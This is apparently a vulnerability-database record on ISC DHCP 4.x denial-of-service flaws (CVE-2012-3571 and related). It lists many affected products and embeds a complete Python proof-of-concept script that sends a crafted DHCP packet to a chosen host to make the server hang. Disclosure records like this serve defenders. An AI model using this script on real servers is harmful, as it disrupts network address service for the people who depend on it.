ID

VAR-E-201104-0002


CVE

cve_id:CVE-2012-3571

Trust: 2.4

cve_id:CVE-2012-3570

Trust: 0.3

cve_id:CVE-2012-3954

Trust: 0.3

cve_id:CVE-2011-0997

Trust: 0.3

sources: BID: 54665 // BID: 47176 // PACKETSTORM: 115094 // EXPLOIT-DB: 37538 // EDBNET: 58746

EDB ID

37538


TITLE

ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities - Linux dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37538

DESCRIPTION

ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities. CVE-2012-3571CVE-84255 . dos exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 37538

AFFECTED PRODUCTS

vendor:iscmodel:dhcpscope:eqversion:4.x

Trust: 1.0

vendor:slackwaremodel:linux x86 64 -currentscope: - version: -

Trust: 0.6

vendor:slackwaremodel:linux x86 64scope:eqversion:13.1

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:13.1

Trust: 0.6

vendor:slackwaremodel:linux x86 64scope:eqversion:13.0

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:13.0

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:12.2

Trust: 0.6

vendor:slackwaremodel:linuxscope:eqversion:12.1

Trust: 0.6

vendor:slackwaremodel:linux -currentscope: - version: -

Trust: 0.6

vendor:redhatmodel:enterprise linux workstation optionalscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux workstationscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux server optionalscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux serverscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux hpc node optionalscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux hpc nodescope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.6

vendor:redhatmodel:enterprise linux desktop optionalscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux desktopscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux desktop clientscope:eqversion:5

Trust: 0.6

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.6

vendor:mandrakesoftmodel:enterprise server x86 64scope:eqversion:5

Trust: 0.6

vendor:mandrakesoftmodel:enterprise serverscope:eqversion:5

Trust: 0.6

vendor:junipermodel:ctpviewscope:eqversion:7.3

Trust: 0.6

vendor:junipermodel:ctpview 7.1r2scope: - version: -

Trust: 0.6

vendor:junipermodel:ctpview 7.1r1scope: - version: -

Trust: 0.6

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.6

vendor:junipermodel:ctpview 7.3r1scope:neversion: -

Trust: 0.6

vendor:junipermodel:ctpview 7.1r3scope:neversion: -

Trust: 0.6

vendor:avayamodel:aura conferencing standardscope:eqversion:6.0

Trust: 0.6

vendor:scmodel:dhcpscope:eqversion:4.1.2

Trust: 0.5

vendor:ubuntumodel:linux lts i386scope:eqversion:12.04

Trust: 0.3

vendor:ubuntumodel:linux lts amd64scope:eqversion:12.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:11.10

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:11.10

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:11.04

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:13.37

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.37

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.4

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.3

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.2

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6.2

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:5

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2011

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2011

Trust: 0.3

vendor:iscmodel:dhcp serverscope:eqversion:4.2.3

Trust: 0.3

vendor:iscmodel:dhcp serverscope:eqversion:4.2.2

Trust: 0.3

vendor:iscmodel:dhcp serverscope:eqversion:4.1.2

Trust: 0.3

vendor:iscmodel:dhcp serverscope:eqversion:4.2.4

Trust: 0.3

vendor:iscmodel:dhcp server 4.2.0-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp serverscope:eqversion:4.2

Trust: 0.3

vendor:iscmodel:dhcp server 4.1-esv-r5scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp server 4.1-esv-r4scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp server 4.1-esv-r3scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp server 4.1-esv-r1scope: - version: -

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:ip office server editionscope:eqversion:8.1

Trust: 0.3

vendor:avayamodel:ip office application serverscope:eqversion:8.1

Trust: 0.3

vendor:avayamodel:aura experience portalscope:eqversion:6.0.1

Trust: 0.3

vendor:avayamodel:aura experience portal sp1scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura experience portalscope:eqversion:6.0

Trust: 0.3

vendor:iscmodel:dhcp server 4.2.4-p1scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcp server 4.1-esv-r6scope:neversion: -

Trust: 0.3

vendor:avayamodel:ip office server editionscope:neversion:9.0

Trust: 0.3

vendor:avayamodel:aura experience portal sp2scope:neversion:6.0

Trust: 0.3

vendor:vmwaremodel:esx serverscope:eqversion:3.0.3

Trust: 0.3

vendor:vmwaremodel:esx serverscope:eqversion:4.1

Trust: 0.3

vendor:vmwaremodel:esx serverscope:eqversion:4.0

Trust: 0.3

vendor:vmwaremodel:esx serverscope:eqversion:3.5

Trust: 0.3

vendor:vmwaremodel:esxscope:eqversion:4.1

Trust: 0.3

vendor:vmwaremodel:esxscope:eqversion:4.0

Trust: 0.3

vendor:vmwaremodel:esxscope:eqversion:3.5

Trust: 0.3

vendor:ubuntumodel:linux sparcscope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux lpiascope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linuxscope:eqversion:9.10

Trust: 0.3

vendor:ubuntumodel:linux lts sparcscope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts powerpcscope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts lpiascope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts i386scope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts amd64scope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts sparcscope:eqversion:6.06

Trust: 0.3

vendor:ubuntumodel:linux lts powerpcscope:eqversion:6.06

Trust: 0.3

vendor:ubuntumodel:linux lts i386scope:eqversion:6.06

Trust: 0.3

vendor:ubuntumodel:linux lts amd64scope:eqversion:6.06

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:10.10

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:10.10

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:10.10

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:10.10

Trust: 0.3

vendor:ubuntumodel:linux sparcscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux ltsscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:10.04

Trust: 0.3

vendor:susemodel:linux enterprise serverscope:eqversion:9

Trust: 0.3

vendor:susemodel:linux enterprise sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise sp3scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise sp2scope:eqversion:10

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:10.2

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:10.1

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:10.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:9.1

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:9.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:12.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:11.0

Trust: 0.3

vendor:s u s emodel:opensusescope:eqversion:11.4

Trust: 0.3

vendor:s u s emodel:opensusescope:eqversion:11.3

Trust: 0.3

vendor:s u s emodel:opensusescope:eqversion:11.2

Trust: 0.3

vendor:s u s emodel:open-enterprise-serverscope:eqversion:0

Trust: 0.3

vendor:s u s emodel:novell linux posscope:eqversion:9

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:3

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:3

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop versionscope:eqversion:4

Trust: 0.3

vendor:pardusmodel:linuxscope:eqversion:20090

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.0.2

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.0.1

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0.2

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0.1

Trust: 0.3

vendor:netbsdmodel:currentscope: - version: -

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.1

Trust: 0.3

vendor:netbsdmodel:rc3scope:eqversion:5.0

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:5.0

Trust: 0.3

vendor:netbsdmodel:beta2scope:eqversion:4.0

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0

Trust: 0.3

vendor:netbsdmodel:4,0 betascope: - version: -

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2010.1

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2010.1

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2010.0

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2010.0

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2009.0

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2009.0

Trust: 0.3

vendor:mandrakesoftmodel:corporate server x86 64scope:eqversion:4.0

Trust: 0.3

vendor:mandrakesoftmodel:corporate serverscope:eqversion:4.0

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:4.1.1

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:3.1.1

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:3.0.4

Trust: 0.3

vendor:iscmodel:dhcpd rc9scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc8scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc7scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc6scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc5scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc4scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc3scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc2scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc14scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc13scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc12scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc11scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc10scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc1scope:eqversion:3.0.1

Trust: 0.3

vendor:iscmodel:dhcpd rc4scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd rc12scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd pl2scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd pl1scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd b2pl9scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd b2pl23scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcpd 4.1.1-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:4.1

Trust: 0.3

vendor:iscmodel:dhcpd 4.0.2-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcpd 4.0.1p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcpdscope:eqversion:4.0

Trust: 0.3

vendor:iscmodel:dhcpd 3.0.5b1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcpd 3.0.2rc1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp client b1pl17scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcp client b1pl14scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcp client b1scope:eqversion:3.0

Trust: 0.3

vendor:iscmodel:dhcp client 4.1.1-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp client 4.1.0p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp clientscope:eqversion:4.1

Trust: 0.3

vendor:iscmodel:dhcp client 4.0.2-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp client 4.0.1p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp clientscope:eqversion:4.0

Trust: 0.3

vendor:iscmodel:dhcp client 3.1.2p1scope: - version: -

Trust: 0.3

vendor:iscmodel:dhcp clientscope:eqversion:3.0

Trust: 0.3

vendor:hpmodel:insight control for linuxscope:eqversion:7.0

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux mipselscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux m68kscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux hppascope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux armelscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux alphascope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linuxscope:eqversion:5.0

Trust: 0.3

vendor:citrixmodel:xenserver sp2scope:eqversion:5.6

Trust: 0.3

vendor:citrixmodel:xenserver feature packscope:eqversion:5.61

Trust: 0.3

vendor:citrixmodel:xenserver common criteriascope:eqversion:5.6

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:5.6

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:5.5

Trust: 0.3

vendor:citrixmodel:xenserver updatescope:eqversion:5.03

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2.8

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp3scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp2scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp1scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp2scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage server sp1scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:message networkingscope:eqversion:5.2.3

Trust: 0.3

vendor:avayamodel:meeting exchange sp2scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchange sp1scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchange sp1scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:5

Trust: 0.3

vendor:avayamodel:ip office application serverscope:eqversion:7.0

Trust: 0.3

vendor:avayamodel:ip office application serverscope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:ip office application serverscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system platform sp3scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system platform sp2scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system platformscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system platformscope:eqversion:1.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.2.3

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.2

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.1

Trust: 0.3

vendor:avayamodel:aura system manager sp2scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:5.2.1

Trust: 0.3

vendor:avayamodel:aura presence servicesscope:eqversion:6.1.1

Trust: 0.3

vendor:avayamodel:aura presence servicesscope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura presence servicesscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura conferencing sp1 standardscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura conferencingscope:eqversion:6.0

Trust: 0.3

vendor:applemodel:time capsulescope:eqversion:7.5.2

Trust: 0.3

vendor:applemodel:time capsulescope:eqversion:7.5

Trust: 0.3

vendor:applemodel:time capsulescope:eqversion:7.4.2

Trust: 0.3

vendor:applemodel:time capsulescope:eqversion:7.4.1

Trust: 0.3

vendor:applemodel:time capsulescope:eqversion:0

Trust: 0.3

vendor:applemodel:airport express base station with 802.11nscope:eqversion:7.5.2

Trust: 0.3

vendor:applemodel:airport express base station with 802.11nscope:eqversion:7.4.1

Trust: 0.3

vendor:iscmodel:dhcpd 4.2.1-p1scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcpd 4.1-esv-r2scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcpd 3.1-esv-r1scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcp client 4.2.1-p1scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcp client 4.1-esv-r2scope:neversion: -

Trust: 0.3

vendor:iscmodel:dhcp client 3.1-esv-r1scope:neversion: -

Trust: 0.3

vendor:avayamodel:message networkingscope:neversion:5.2.4

Trust: 0.3

vendor:avayamodel:ip office application serverscope:neversion:8.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:neversion:6.3

Trust: 0.3

vendor:avayamodel:aura presence servicesscope:neversion:6.1.2

Trust: 0.3

vendor:applemodel:time capsulescope:neversion:7.6

Trust: 0.3

vendor:applemodel:airport express base station with 802.11nscope:neversion:7.6

Trust: 0.3

sources: BID: 54665 // BID: 47176 // PACKETSTORM: 115094 // EXPLOIT-DB: 37538

EXPLOIT

source: https://www.securityfocus.com/bid/54665/info

ISC DHCP is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.

#!/usr/bin/python
'''
SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
service(infinite loop and CPU consumption/chew) via zero'ed client name length

http://www.k1p0d.com

'''

import socket
import getopt
from sys import argv

def main():
args = argv[1:]
try:
args, useless = getopt.getopt(args, 'p:h:')
args = dict(args)
args['-p']
args['-h']
except:
usage(argv[0])
exit(-1)

dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x22\x5f\xae'
'\xa7\xdf\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x63\x82\x53\x63'
'\x35\x01\x03\x32\x04\x0a\x00\x00'
'\x01\x0c\x00'
'\x37\x0d\x01\x1c\x02\x03\x0f'
'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
'\xff\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00')

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((args['-h'], int(args['-p'])))
sock.sendall(dhcp_req_packet)
print 'Packet sent'
sock.close()

def usage(pyname):
print '''
Usage: %s -h <host> -p <port>
''' % pyname

if __name__ == "__main__":
main()

Trust: 1.0

sources: EXPLOIT-DB: 37538

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 37538

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37538

TYPE

Multiple Denial of Service Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 37538

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 115094

CREDITS

Markus Hietava

Trust: 0.6

sources: EXPLOIT-DB: 37538

EXTERNAL IDS

db:NVDid:CVE-2012-3571

Trust: 2.4

db:EXPLOIT-DBid:37538

Trust: 1.9

db:BIDid:54665

Trust: 1.9

db:JUNIPERid:JSA10761

Trust: 0.6

db:EDBNETid:58746

Trust: 0.6

db:PACKETSTORMid:115094

Trust: 0.5

db:NVDid:CVE-2012-3570

Trust: 0.3

db:NVDid:CVE-2012-3954

Trust: 0.3

db:NVDid:CVE-2011-0997

Trust: 0.3

db:CERT/CCid:VU#107886

Trust: 0.3

db:BIDid:47176

Trust: 0.3

sources: BID: 54665 // BID: 47176 // PACKETSTORM: 115094 // EXPLOIT-DB: 37538 // EDBNET: 58746

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-3571

Trust: 2.1

url:https://www.securityfocus.com/bid/54665/info

Trust: 1.0

url:http://www.isc.org/software/dhcp

Trust: 0.6

url:https://kb.juniper.net/infocenter/index?page=content&id=jsa10761&cat=sirt_1&actp=list

Trust: 0.6

url:https://www.exploit-db.com/exploits/37538/

Trust: 0.6

url:https://www.exploit-db.com/exploits/37538

Trust: 0.3

url:http://www.cert.fi/en/reports/2012/vulnerability636698.html

Trust: 0.3

url:https://www.isc.org/software/dhcp/advisories/cve-2012-3571

Trust: 0.3

url:https://downloads.avaya.com/css/p8/documents/100166045

Trust: 0.3

url:https://www.isc.org/software/dhcp/advisories/cve-2012-3570

Trust: 0.3

url:https://www.isc.org/software/dhcp/advisories/cve-2012-3954

Trust: 0.3

url:http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html

Trust: 0.3

url:http://lists.vmware.com/pipermail/security-announce/2011/000142.html

Trust: 0.3

url:http://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2011-005.txt.asc

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/107886

Trust: 0.3

url:http://lists.apple.com/archives/security-announce/2011/nov/msg00002.html

Trust: 0.3

url:http://support.citrix.com/article/ctx130325

Trust: 0.3

url:https://www.isc.org/software/dhcp/advisories/cve-2011-0997

Trust: 0.3

url:http://support.avaya.com/css/p8/documents/100143367

Trust: 0.3

sources: BID: 54665 // BID: 47176 // PACKETSTORM: 115094 // EXPLOIT-DB: 37538 // EDBNET: 58746

SOURCES

db:BIDid:54665
db:BIDid:47176
db:PACKETSTORMid:115094
db:EXPLOIT-DBid:37538
db:EDBNETid:58746

LAST UPDATE DATE

2022-07-27T09:59:09.687000+00:00


SOURCES UPDATE DATE

db:BIDid:54665date:2016-10-26T04:08:00
db:BIDid:47176date:2016-10-26T09:06:00

SOURCES RELEASE DATE

db:BIDid:54665date:2012-07-25T00:00:00
db:BIDid:47176date:2011-04-05T00:00:00
db:PACKETSTORMid:115094date:2012-07-29T12:12:12
db:EXPLOIT-DBid:37538date:2012-07-25T00:00:00
db:EDBNETid:58746date:2012-07-25T00:00:00